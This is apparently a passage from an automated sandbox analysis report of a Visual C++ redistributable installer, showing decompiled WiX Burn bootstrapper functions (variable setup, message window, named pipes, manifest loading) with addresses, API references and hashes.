				_v292 =  &M01289443;
				_v288 = 0;
				asm("stosd");
				_v280 = L"TemplateFolder";
				_v276 = 0x12893dc;
				_v272 = 0x15;
				asm("stosd");
				_v264 = L"TerminalServer";
				_v260 = _t262;
				_v256 = 0xd;
				asm("stosd");
				_v248 = L"UserLanguageID";
				_v244 = 0x12897fd;
				_v240 = 0;
				asm("stosd");
				_v232 = L"VersionMsi";
				_v228 = 0x1289314;
				_v224 = 0;
				asm("stosd");
				_v216 = L"VersionNT";
				_v212 = _t262;
				_v208 = 1;
				asm("stosd");
				_v196 = _t262;
				_v200 = L"VersionNT64";
				_v192 = 2;
				asm("stosd");
				_v180 = 0x12893dc;
				_v184 = L"WindowsFolder";
				_v176 = 0x24;
				asm("stosd");
				_v168 = L"WindowsVolume";
				_v164 =  &M01289611;
				_v160 = 0;
				asm("stosd");
				_v148 = 0x128985a;
				_v152 = L"WixBundleAction";
				_v144 = 0;
				asm("stosd");
				_v124 = 1;
				_v116 = 0x128985a;
				_v136 = L"WixBundleForcedRestartPackage";
				_v132 = 0x128982f;
				_v128 = 0;
				_v120 = L"WixBundleInstalled";
				_v112 = 0;
				asm("stosd");
				_v100 = 0x128985a;
				_v104 = L"WixBundleElevated";
				_v96 = 0;
				asm("stosd");
				_v88 = L"WixBundleActiveParent";
				_v84 = 0x128982f;
				_v80 = 0;
				asm("stosd");
				_v72 = L"WixBundleProviderKey";
				_v68 = 0x128982f;
				_v64 = 0x12ba5c8;
				asm("stosd");
				_v56 = L"WixBundleManufacturer";
				_v52 = 0x128982f;
				_v48 = 0x12ba5c8;
				asm("stosd");
				_v40 = L"WixBundleTag";
				_v36 = 0x128982f;
				_v32 = 0x12ba5c8;
				asm("stosd");
				_v24 = L"WixBundleVersion";
				_v20 = 0x1289a2f;
				_v16 = 0;
				asm("stosd");
				_v924 = 0;
				_t256 =  &_v912;
				while(1) {
					_t247 = E0128ADDA(0x128982f, _v928,  *((intOrPtr*)(_t256 - 8)),  *((intOrPtr*)(_t256 - 4)),  *_t256,  *((intOrPtr*)(_t256 + 4))); // executed
					_t322 = _t247;
					if(_t247 < 0) {
						break;
					}
					_v924 = _v924 + 1;
					_t256 = _t256 + 0x10;
					if(_v924 < 0x39) {
						continue;
					} else {
					}
					L5:
					return E012A7EAA(_t322, _t256, _v8 ^ _t324, 0x12ba5c8, _t322, 0);
				}
				E012AFA86(_t322, "Failed to add built-in variable: %ls.",  *((intOrPtr*)(_t256 - 8)));
				goto L5;
			}

0x0128ae5f
0x0128ae66
0x0128ae69
0x0128ae70
0x0128ae76
0x0128ae7e
0x0128ae88
0x0128ae97
0x0128aea3
0x0128aea4
0x0128aeae
0x0128aeb4
0x0128aec4
0x0128aec5
0x0128aecf
0x0128aed5
0x0128aee5
0x0128aee6
0x0128aef2
0x0128aef3
0x0128aefe
0x0128af0a
0x0128af0b
0x0128af11
0x0128af1b
0x0128af27
0x0128af28
0x0128af2e
0x0128af38
0x0128af48
0x0128af49
0x0128af53
0x0128af5d
0x0128af62
0x0128af70
0x0128af71
0x0128af7b
0x0128af85
0x0128af91
0x0128af92
0x0128af9c
0x0128afa6
0x0128afb2
0x0128afb3
0x0128afbd
0x0128afc3
0x0128afcf
0x0128afd0
0x0128afda
0x0128afe0
0x0128aff0
0x0128aff1
0x0128affb
0x0128b001
0x0128b011
0x0128b018
0x0128b022
0x0128b02c
0x0128b032
0x0128b033
0x0128b03d
0x0128b047
0x0128b053
0x0128b054
0x0128b05e
0x0128b064
0x0128b074
0x0128b075
0x0128b07f
0x0128b089
0x0128b095
0x0128b096
0x0128b0a0
0x0128b0a6
0x0128b0b6
0x0128b0b7
0x0128b0c1
0x0128b0c7
0x0128b0d7
0x0128b0d8
0x0128b0e2
0x0128b0e8
0x0128b0f8
0x0128b0f9
0x0128b103
0x0128b109
0x0128b119
0x0128b11a
0x0128b124
0x0128b12a
0x0128b13a
0x0128b13b
0x0128b145
0x0128b14b
0x0128b15b
0x0128b15c
0x0128b166
0x0128b16c
0x0128b17c
0x0128b17d
0x0128b187
0x0128b18d
0x0128b19d
0x0128b19e
0x0128b1a8
0x0128b1ae
0x0128b1be
0x0128b1bf
0x0128b1c9
0x0128b1cf
0x0128b1df
0x0128b1e0
0x0128b1ea
0x0128b1f4
0x0128b200
0x0128b201
0x0128b209
0x0128b20a
0x0128b214
0x0128b220
0x0128b227
0x0128b231
0x0128b237
0x0128b23d
0x0128b23e
0x0128b248
0x0128b24e
0x0128b25e
0x0128b25f
0x0128b269
0x0128b26f
0x0128b27f
0x0128b280
0x0128b28a
0x0128b294
0x0128b2a0
0x0128b2a1
0x0128b2ab
0x0128b2b1
0x0128b2c1
0x0128b2c2
0x0128b2cc
0x0128b2d2
0x0128b2e2
0x0128b2e3
0x0128b2ed
0x0128b2f3
0x0128b303
0x0128b304
0x0128b30e
0x0128b314
0x0128b324
0x0128b325
0x0128b32f
0x0128b335
0x0128b33a
0x0128b346
0x0128b347
0x0128b34d
0x0128b35a
0x0128b366
0x0128b367
0x0128b371
0x0128b37b
0x0128b387
0x0128b388
0x0128b392
0x0128b39c
0x0128b3a8
0x0128b3a9
0x0128b3b3
0x0128b3b9
0x0128b3c9
0x0128b3ca
0x0128b3d4
0x0128b3da
0x0128b3ea
0x0128b3eb
0x0128b3f5
0x0128b3ff
0x0128b40b
0x0128b412
0x0128b41c
0x0128b426
0x0128b42c
0x0128b42d
0x0128b437
0x0128b43d
0x0128b449
0x0128b44a
0x0128b450
0x0128b45a
0x0128b46a
0x0128b46b
0x0128b471
0x0128b47b
0x0128b48b
0x0128b48c
0x0128b496
0x0128b4a0
0x0128b4b1
0x0128b4b2
0x0128b4b8
0x0128b4c2
0x0128b4d3
0x0128b4d4
0x0128b4d7
0x0128b4da
0x0128b4e4
0x0128b4e7
0x0128b4ea
0x0128b4f1
0x0128b4f7
0x0128b4f8
0x0128b4fb
0x0128b502
0x0128b508
0x0128b509
0x0128b510
0x0128b513
0x0128b519
0x0128b51f
0x0128b526
0x0128b529
0x0128b52f
0x0128b530
0x0128b537
0x0128b53a
0x0128b540
0x0128b541
0x0128b548
0x0128b54b
0x0128b551
0x0128b555
0x0128b55c
0x0128b563
0x0128b566
0x0128b567
0x0128b56d
0x0128b573
0x0128b584
0x0128b589
0x0128b58d
0x00000000
0x00000000
0x0128b58f
0x0128b595
0x0128b59f
0x00000000
0x00000000
0x0128b5a1
0x0128b5b4
0x0128b5c4
0x0128b5c4
0x0128b5ac
0x00000000

APIs

InitializeCriticalSection.KERNEL32(01282222,00000000,01281D56,012821DE), ref: 0128AE76

Strings

Date, xrefs: 0128AF71
WixBundleActiveParent, xrefs: 0128B509
Failed to add built-in variable: %ls., xrefs: 0128B5A6
WixBundleInstalled, xrefs: 0128B4EA
$, xrefs: 0128B47B
WixBundleAction, xrefs: 0128B4B8
WixBundleElevated, xrefs: 0128B4FB
InstallerName, xrefs: 0128B018
9, xrefs: 0128B598
WixBundleForcedRestartPackage, xrefs: 0128B4DA
0, xrefs: 0128AE88
LogonUser, xrefs: 0128B075
WixBundleTag, xrefs: 0128B541
WixBundleVersion, xrefs: 0128B555
#, xrefs: 0128AED5
WixBundleManufacturer, xrefs: 0128B530
WixBundleProviderKey, xrefs: 0128B51F
', xrefs: 0128B0A6
InstallerVersion, xrefs: 0128B033

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$9$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleManufacturer$WixBundleProviderKey$WixBundleTag$WixBundleVersion
API String ID: 32694325-3014018290
Opcode ID: 54fa3118a60a3acc4d8b1aeb0ddac46888e8b1c2eabafaa79d21840d6ab5ab13
Instruction ID: ce68039e2ce139edce8c872a182e741f649527bb889e9efa194b404b6434b142
Opcode Fuzzy Hash: 54fa3118a60a3acc4d8b1aeb0ddac46888e8b1c2eabafaa79d21840d6ab5ab13
Instruction Fuzzy Hash: 6E127BB5C116289BDB6A9F49C9493DEFBB5BB88708F0086DD920C7B214C7711B89CF85

Uniqueness

Uniqueness Score: -1.00%

Function 01291377 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 139
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E01291377(void** _a4) {
				struct HWND__* _v8;
				intOrPtr _v12;
				void _v16;
				struct tagMSG _v44;
				struct _WNDCLASSW _v84;
				int _t46;
				signed int _t47;
				signed int _t48;
				short _t51;
				struct HWND__* _t55;
				int _t58;
				int _t64;
				signed int _t69;
				signed int _t72;
				signed int _t77;
				void** _t88;
				void* _t89;

				asm("stosd");
				asm("stosd");
				_t77 = 0xa;
				_t46 = memset( &_v84, 0, _t77 << 2);
				_push(7);
				_t47 = memset( &_v44, _t46, 0 << 2);
				_t88 = _a4;
				_t89 = _t88[2];
				_v8 = 0;
				_t48 = _t47 & 0xffffff00 |  *((intOrPtr*)(_t89 + 0x480)) == 0x00000001;
				_a4 = _t48;
				if(_t48 == 0 || TlsSetValue( *(_t89 + 0x48c),  *(_t89 + 0x4a4)) != 0) {
					_v84.hInstance = _t88[1];
					_v84.lpfnWndProc = 0x1291297;
					_v84.lpszClassName = L"WixBurnMessageWindow";
					_t51 = RegisterClassW( &_v84); // executed
					if(_t51 != 0) {
						_v16 = _a4;
						_v12 = _t89 + 0xb8;
						_t55 = CreateWindowExW(0x80, _v84.lpszClassName, 0, 0x90000000, 0x80000000, 8, 0, 0, 0, 0, _t88[1],  &_v16); // executed
						if(_t55 != 0) {
							 *(_t89 + 0x3d0) = _t55;
							SetEvent( *_t88);
							while(1) {
								_t58 = GetMessageW( &_v44, 0, 0, 0);
								if(_t58 == 0) {
									break;
								}
								if(_t58 == 0xffffffff) {
									_push("Unexpected return value from message pump.");
									_v8 = 0x8000ffff;
									_push(0x8000ffff);
									L23:
									E012AFA86();
									goto L24;
								}
								_t64 = IsDialogMessageW(_v44,  &_v44); // executed
								if(_t64 == 0) {
									TranslateMessage( &_v44);
									DispatchMessageW( &_v44);
								}
							}
							goto L24;
						}
						_t69 = GetLastError();
						if(_t69 > 0) {
							_t69 = _t69 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t69;
						if(_t69 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t69, "uithread.cpp", 0x92, _v8);
						_push("Failed to create window.");
						L9:
						_push(_v8);
						goto L23;
					}
					_t72 = GetLastError();
					if(_t72 > 0) {
						_t72 = _t72 & 0x0000ffff | 0x80070000;
					}
					_v8 = _t72;
					if(_t72 >= 0) {
						_v8 = 0x80004005;
					}
					E012B294E(_t72, "uithread.cpp", 0x88, _v8);
					_push("Failed to register window.");
					goto L9;
				} else {
					_v8 = 0x8007139f;
					L24:
					UnregisterClassW(L"WixBurnMessageWindow", _t88[1]);
					return _v8;
				}
			}

0x01291385
0x01291386
0x0129138b
0x0129138f
0x01291391
0x01291397
0x01291399
0x0129139c
0x012913a8
0x012913ab
0x012913ae
0x012913b3
0x012913da
0x012913e1
0x012913e8
0x012913ef
0x012913f8
0x0129143e
0x01291447
0x0129146a
0x01291472
0x012914af
0x012914b7
0x012914ef
0x012914f6
0x012914fa
0x00000000
0x00000000
0x012914c8
0x01291503
0x01291508
0x0129150b
0x0129150c
0x0129150c
0x00000000
0x01291512
0x012914d1
0x012914d9
0x012914df
0x012914e9
0x012914e9
0x012914d9
0x00000000
0x012914fc
0x01291474
0x0129147c
0x01291483
0x01291483
0x01291488
0x0129148d
0x0129148f
0x0129148f
0x012914a3
0x012914a8
0x01291433
0x01291433
0x00000000
0x01291433
0x012913fa
0x01291402
0x01291409
0x01291409
0x0129140e
0x01291413
0x01291415
0x01291415
0x01291429
0x0129142e
0x00000000
0x012913cb
0x012913cb
0x01291513
0x0129151b
0x01291528
0x01291528

APIs

TlsSetValue.KERNEL32(?,?), ref: 012913C1
RegisterClassW.USER32 ref: 012913EF
GetLastError.KERNEL32 ref: 012913FA
CreateWindowExW.USER32 ref: 0129146A
GetLastError.KERNEL32 ref: 01291474
SetEvent.KERNEL32(?), ref: 012914B7
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 012914F6
UnregisterClassW.USER32 ref: 0129151B

Strings

Failed to register window., xrefs: 0129142E
uithread.cpp, xrefs: 01291424, 0129149E
WixBurnMessageWindow, xrefs: 012913E8, 01291516
Unexpected return value from message pump., xrefs: 01291503
Failed to create window., xrefs: 012914A8

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ClassErrorLast$CreateEventMessageRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 367376830-288575659
Opcode ID: c189685e626e8a6cd492e6ee7001d327487db0d441e4d4a8b90e45f3662bc278
Instruction ID: df6e1173c688472fc1b1e45b94e72cd2131844dfcae47a718692e2755172118f
Opcode Fuzzy Hash: c189685e626e8a6cd492e6ee7001d327487db0d441e4d4a8b90e45f3662bc278
Instruction Fuzzy Hash: 8041817291020AFFDF219FA9DD88AEDBBB9FF08364F108529F215E7140D774AA148B50

Uniqueness

Uniqueness Score: -1.00%

Function 012838B6 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 158
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E012838B6(void* __ebx, void* __ecx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t31;
				void* _t32;
				signed int _t35;
				void* _t42;
				signed int _t43;
				signed int _t59;
				signed int _t60;
				intOrPtr* _t63;
				void* _t65;
				void* _t66;

				_v8 = _v8 & 0x00000000;
				_t63 = _a4;
				_t59 = E012B177A( &_v8, L"\\\\.\\pipe\\%ls",  *_t63);
				_t66 = _t65 + 0xc;
				if(_t59 >= 0) {
					_a4 = _a4 & 0x00000000;
					_t60 = 0x8000ffff;
					while(_a4 < 0x708) {
						_t60 = 0;
						_t29 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0); // executed
						 *(_t63 + 0x10) = _t29;
						if(_t29 == 0xffffffff) {
							_t29 = GetLastError();
							if(_t29 > 0) {
								_t29 = _t29 & 0x0000ffff | 0x80070000;
							}
							_t60 = _t29;
							if(_t60 == 0x80070002) {
								_t60 = 0x800705b4;
							}
							Sleep(0x64); // executed
						}
						_a4 = _a4 + 1;
						if(_t60 < 0) {
							continue;
						}
						break;
					}
					if(_t60 >= 0) {
						_t13 = _t63 + 8; // 0x8
						_t31 = E01283156( *(_t63 + 0x10),  *((intOrPtr*)(_t63 + 4)), _t13); // executed
						_t59 = _t31;
						if(_t59 >= 0) {
							if(_a8 == 0) {
								L26:
								_t32 = OpenProcess(0x100000, 0,  *(_t63 + 8));
								 *(_t63 + 0xc) = _t32;
								if(_t32 == 0) {
									_t35 = GetLastError();
									if(_t35 > 0) {
										_t35 = _t35 & 0x0000ffff | 0x80070000;
									}
									_t59 = _t35;
									if(_t59 >= 0) {
										_t59 = 0x80004005;
									}
									E012B294E(_t35, "pipe.cpp", 0x2b9, _t59);
									_push( *(_t63 + 8));
									_push("Failed to open companion process with PID: %u");
									goto L32;
								}
							} else {
								_t59 = E012B177A( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t63);
								_t66 = _t66 + 0xc;
								if(_t59 >= 0) {
									_t42 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0); // executed
									 *(_t63 + 0x14) = _t42;
									if(_t42 != 0xffffffff) {
										_t21 = _t63 + 8; // 0x8
										_t43 = E01283156(_t42,  *((intOrPtr*)(_t63 + 4)), _t21); // executed
										_t59 = _t43;
										if(_t59 < 0) {
											goto L15;
										} else {
											goto L26;
										}
									} else {
										_t29 = GetLastError();
										if(_t29 > 0) {
											_t29 = _t29 & 0x0000ffff | 0x80070000;
										}
										_t59 = _t29;
										if(_t59 >= 0) {
											_t59 = 0x80004005;
										}
										_push(_t59);
										_push(0x2b0);
										goto L13;
									}
								} else {
									_push("Failed to allocate name of parent cache pipe.");
									_push(_t59);
									E012AFA86();
								}
							}
						} else {
							L15:
							_push(_v8);
							_push("Failed to verify parent pipe: %ls");
							goto L32;
						}
					} else {
						_push(_t60);
						_push(0x2a1);
						L13:
						_push("pipe.cpp");
						E012B294E(_t29);
						_push(_v8);
						_push("Failed to open parent pipe: %ls");
						L32:
						_push(_t59);
						E012AFA86();
					}
				} else {
					_push("Failed to allocate name of parent pipe.");
					_push(_t59);
					E012AFA86();
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t59;
			}

0x012838ba
0x012838bf
0x012838d3
0x012838d5
0x012838da
0x012838ee
0x012838f9
0x012838fe
0x01283907
0x01283917
0x01283919
0x0128391f
0x01283921
0x01283929
0x01283930
0x01283930
0x01283935
0x0128393d
0x0128393f
0x0128393f
0x01283946
0x01283946
0x0128394c
0x01283951
0x00000000
0x00000000
0x00000000
0x01283951
0x01283955
0x01283974
0x0128397e
0x01283983
0x01283987
0x0128399a
0x01283a26
0x01283a30
0x01283a36
0x01283a3b
0x01283a3d
0x01283a45
0x01283a4c
0x01283a4c
0x01283a51
0x01283a55
0x01283a57
0x01283a57
0x01283a67
0x01283a6c
0x01283a6f
0x00000000
0x01283a6f
0x012839a0
0x012839b0
0x012839b4
0x012839b9
0x012839db
0x012839dd
0x012839e3
0x01283a0f
0x01283a17
0x01283a1c
0x01283a20
0x00000000
0x00000000
0x00000000
0x00000000
0x012839e5
0x012839e5
0x012839ed
0x012839f4
0x012839f4
0x012839f9
0x012839fd
0x012839ff
0x012839ff
0x01283a04
0x01283a05
0x00000000
0x01283a05
0x012839bb
0x012839bb
0x012839c0
0x012839c1
0x012839c7
0x012839b9
0x01283989
0x01283989
0x01283989
0x0128398c
0x00000000
0x0128398c
0x01283957
0x01283957
0x01283958
0x0128395d
0x0128395d
0x01283962
0x01283967
0x0128396a
0x01283a74
0x01283a74
0x01283a75
0x01283a7a
0x012838dc
0x012838dc
0x012838e1
0x012838e2
0x012838e8
0x01283a82
0x01283a87
0x01283a87
0x01283a91

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 01283917
GetLastError.KERNEL32 ref: 01283921
Sleep.KERNELBASE(00000064), ref: 01283946

Strings

\\.\pipe\%ls.Cache, xrefs: 012839A5
Failed to open companion process with PID: %u, xrefs: 01283A6F
Failed to allocate name of parent cache pipe., xrefs: 012839BB
Failed to open parent pipe: %ls, xrefs: 0128396A
pipe.cpp, xrefs: 0128395D, 01283A62
Failed to allocate name of parent pipe., xrefs: 012838DC
\\.\pipe\%ls, xrefs: 012838C8
Failed to verify parent pipe: %ls, xrefs: 0128398C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 408151869-645222887
Opcode ID: f97ce2c32d8c7a8ce344af0d008cb598113442cea56be187534d7f8aab128d15
Instruction ID: b9f901b91fbb5398eb028b3c7cdcfd261e0e5f10b48f4718f81c431269d54eb1
Opcode Fuzzy Hash: f97ce2c32d8c7a8ce344af0d008cb598113442cea56be187534d7f8aab128d15
Instruction Fuzzy Hash: 01411732971302BBDB31EA61DD85FAA7AA9BF84F60F204528F654E31D0EBB9D5009750

Uniqueness

Uniqueness Score: -1.00%

Function 0128D764 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0128D764(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr* _t100;
				void* _t103;
				void* _t106;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t106 = __edx;
				_t103 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				E012A7E30( &_v108, 0, 0x58);
				_v8 = 0;
				_t118 = _a8;
				_t7 = _t118 + 0x1b8; // 0x1281f0e
				_t8 = _t118 + 0x4cc; // 0x1282222
				_t9 = _t118 + 0x138; // 0x1281e8e
				_t10 = _t118 + 0x3f0; // 0x1282146
				_t11 = _t118 + 0x3ec; // 0x1282142
				_t12 = _t118 + 0x4c8; // 0x128221e
				_t13 = _t118 + 0x488; // 0x12821de
				_t100 = _t13;
				_t15 = _t118 + 0x3dc; // 0x1282132
				_t16 = _t118 + 0x3e0; // 0x1282136
				_t17 = _t118 + 0x484; // 0x12821da
				_t18 = _t118 + 0x480; // 0x12821d6
				_t19 = _t118 + 0x4ac; // 0x1282202
				_t20 = _t118 + 0x494; // 0x12821ea
				_t21 = _t118 + 0x1c; // 0x1281d72
				_t67 = E0128C7EA(_a4, _t100, _t103, _t107, _t118, _t21, _t20, _t19, _t18, _t17, _t16, _t15,  &_v8, _t100, _t12, _t11, _t10, _t9, _t8, _t7); // executed
				if(_t67 >= 0) {
					_t23 = _t118 + 0x88; // 0x1281dde
					_t69 = E0128AE56(_t23); // executed
					_t104 = 0;
					__eflags = _t69;
					if(_t69 >= 0) {
						_t70 = 0;
						__eflags =  *_t100;
						if( *_t100 != 0) {
							_t70 = 1;
							__eflags = 1;
						}
						_t24 = _t118 + 0x88; // 0x1281dde
						_t72 = E0128A6F5(_t24, L"WixBundleElevated", _t70, _t104, 1);
						_t110 = _t72;
						__eflags = _t72;
						if(__eflags >= 0) {
							_t26 = _t118 + 0x48; // 0x1281d9e
							_t75 = E012A05CB(_t106, __eflags, _t26,  &_v108); // executed
							__eflags = _t75;
							if(_t75 >= 0) {
								_t78 = E012A006B( &_v108,  &_v16);
								__eflags = _t78;
								if(_t78 >= 0) {
									__eflags = E012A00A1( &_v108,  &_v12,  &_v20);
									if(__eflags >= 0) {
										_t83 = E012A3843(_t106, __eflags, _v12, _v20, _t118); // executed
										__eflags = _t83;
										if(_t83 >= 0) {
											__eflags = _v8;
											if(_v8 == 0) {
												L19:
												_t37 = _t118 + 0x488; // 0xffff250a
												_t84 =  *_t37;
												__eflags = _t84;
												if(__eflags == 0) {
													L21:
													_t38 = _t118 + 0xcc; // 0x1281e22
													_t102 = _t38;
													_t39 = _t118 + 0x108; // 0x2bab1868
													_t85 = E0128B753(_t104, _t106, __eflags,  *_t39, _t38);
													__eflags = _t85;
													if(_t85 >= 0) {
														_t104 =  &_v108;
														_t41 = _t118 + 0xbc; // 0x1281e12
														_t116 = E012851BD( &_v108, _t106, _t41, 0,  &_v108,  *_t102);
														__eflags = _t116;
														if(_t116 >= 0) {
															_t42 = _t118 + 0xbc; // 0x1281e12
															_t116 = E01283D13( &_v108, _t106, _t118 + 0x2a8, _t42);
															__eflags = _t116;
															if(_t116 < 0) {
																_push("Failed to load catalog files.");
																goto L27;
															}
														} else {
															_push("Failed to extract bootstrapper application payloads.");
															goto L27;
														}
													} else {
														_push("Failed to get unique temporary folder for bootstrapper application.");
														goto L27;
													}
												} else {
													__eflags = _t84 - 1;
													if(__eflags == 0) {
														goto L21;
													}
												}
											} else {
												_t36 = _t118 + 0x88; // 0x1281dde
												_t116 = E0128A734(_t36, L"WixBundleOriginalSource", _v8, 0);
												__eflags = _t116;
												if(_t116 >= 0) {
													goto L19;
												} else {
													_push("Failed to set original source variable.");
													goto L27;
												}
											}
										} else {
											_push("Failed to load manifest.");
											goto L27;
										}
									} else {
										_push("Failed to get manifest stream from container.");
										goto L27;
									}
								} else {
									_push("Failed to open manifest stream.");
									goto L27;
								}
							} else {
								_push("Failed to open attached UX container.");
								goto L27;
							}
						} else {
							E012AFA86(_t110, "Failed to overwrite the %ls built-in variable.", L"WixBundleElevated");
						}
					} else {
						_push("Failed to initialize variables.");
						goto L27;
					}
				} else {
					_push("Failed to parse command line.");
					L27:
					E012AFA86();
					_t104 = _t116;
				}
				E012A00D7(_t104,  &_v108);
				if(_v16 != 0) {
					E012B01E8(_v16);
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				if(_v12 != 0) {
					E012B24F6(_v12); // executed
				}
				return _t116;
			}

0x0128d764
0x0128d764
0x0128d776
0x0128d779
0x0128d77c
0x0128d77f
0x0128d787
0x0128d78a
0x0128d78d
0x0128d794
0x0128d79b
0x0128d7a2
0x0128d7a9
0x0128d7b0
0x0128d7b7
0x0128d7b7
0x0128d7c2
0x0128d7c9
0x0128d7d0
0x0128d7d7
0x0128d7de
0x0128d7e5
0x0128d7ec
0x0128d7f3
0x0128d7fc
0x0128d808
0x0128d80f
0x0128d816
0x0128d818
0x0128d81a
0x0128d826
0x0128d828
0x0128d82a
0x0128d82c
0x0128d82c
0x0128d82c
0x0128d837
0x0128d83e
0x0128d843
0x0128d845
0x0128d847
0x0128d861
0x0128d865
0x0128d86c
0x0128d86e
0x0128d882
0x0128d889
0x0128d88b
0x0128d8aa
0x0128d8ac
0x0128d8bf
0x0128d8c6
0x0128d8c8
0x0128d8d4
0x0128d8d8
0x0128d8fd
0x0128d8fd
0x0128d8fd
0x0128d903
0x0128d905
0x0128d90c
0x0128d90c
0x0128d90c
0x0128d913
0x0128d919
0x0128d920
0x0128d922
0x0128d92d
0x0128d931
0x0128d93f
0x0128d941
0x0128d943
0x0128d94c
0x0128d95f
0x0128d961
0x0128d963
0x0128d965
0x00000000
0x0128d965
0x0128d945
0x0128d945
0x00000000
0x0128d945
0x0128d924
0x0128d924
0x00000000
0x0128d924
0x0128d907
0x0128d907
0x0128d90a
0x00000000
0x00000000
0x0128d90a
0x0128d8da
0x0128d8df
0x0128d8f0
0x0128d8f2
0x0128d8f4
0x00000000
0x0128d8f6
0x0128d8f6
0x00000000
0x0128d8f6
0x0128d8f4
0x0128d8ca
0x0128d8ca
0x00000000
0x0128d8ca
0x0128d8ae
0x0128d8ae
0x00000000
0x0128d8ae
0x0128d88d
0x0128d88d
0x00000000
0x0128d88d
0x0128d870
0x0128d870
0x00000000
0x0128d870
0x0128d849
0x0128d850
0x0128d855
0x0128d81c
0x0128d81c
0x00000000
0x0128d81c
0x0128d7fe
0x0128d7fe
0x0128d96a
0x0128d96b
0x0128d971
0x0128d971
0x0128d976
0x0128d980
0x0128d985
0x0128d985
0x0128d98d
0x0128d992
0x0128d992
0x0128d99a
0x0128d99f
0x0128d99f
0x0128d9aa

APIs

_memset.LIBCMT ref: 0128D77F

Strings

Failed to get unique temporary folder for bootstrapper application., xrefs: 0128D924
Failed to extract bootstrapper application payloads., xrefs: 0128D945
Failed to set original source variable., xrefs: 0128D8F6
Failed to overwrite the %ls built-in variable., xrefs: 0128D84A
WixBundleOriginalSource, xrefs: 0128D8E5
Failed to load catalog files., xrefs: 0128D965
WixBundleElevated, xrefs: 0128D831, 0128D836, 0128D849
Failed to get manifest stream from container., xrefs: 0128D8AE
Failed to initialize variables., xrefs: 0128D81C
Failed to open manifest stream., xrefs: 0128D88D
Failed to open attached UX container., xrefs: 0128D870
Failed to parse command line., xrefs: 0128D7FE
Failed to load manifest., xrefs: 0128D8CA

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
